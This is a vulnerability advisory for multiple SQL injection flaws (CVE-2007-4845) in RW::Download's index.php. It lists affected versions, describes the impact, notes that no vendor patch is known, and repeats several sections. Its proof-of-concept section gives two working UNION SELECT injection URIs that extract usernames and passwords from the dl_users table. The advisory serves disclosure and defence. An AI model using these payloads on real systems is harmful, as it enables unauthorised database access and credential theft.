RW::Download Index.PHP Multiple SQL Injection Vulnerabilities
BID:25589
Info
RW::Download Index.PHP Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 25589 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-4845 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 07 2007 12:00AM |
| Updated: | Apr 16 2015 06:09PM |
| Credit: | k1tk4t is credited with the discovery of these vulnerabilities. |
| Vulnerable: |
RW::Scripts RW::Download 4.0.6 RW::Scripts RW::Download 2.0.3 lite |
| Not Vulnerable: | |
Discussion
RW::Download Index.PHP Multiple SQL Injection Vulnerabilities
RW::Download is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
RW::Download 2.0.3 lite is vulnerable.
RW::Download is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
RW::Download 2.0.3 lite is vulnerable.
Exploit / POC
RW::Download Index.PHP Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*
http://www.example.com/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*
Attackers can use a browser to exploit these issues.
The following example URIs are available:
http://www.example.com/index.php?url=&dlid=-9%20UNION%20SELECT%20null,null,null,null,username,null,null,null,null,null,null,null,null,password,null,null,null,null%20from%20dl_users/*
http://www.example.com/index.php?url=&cid=-9%20UNION%20SELECT%20null,null,concat(username,0x3a,password),null,null,null%20from%20dl_users/*
Solution / Fix
RW::Download Index.PHP Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for these issues. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
RW::Download Index.PHP Multiple SQL Injection Vulnerabilities
References:
References:
- RW::Download Homepage (RW::Scripts)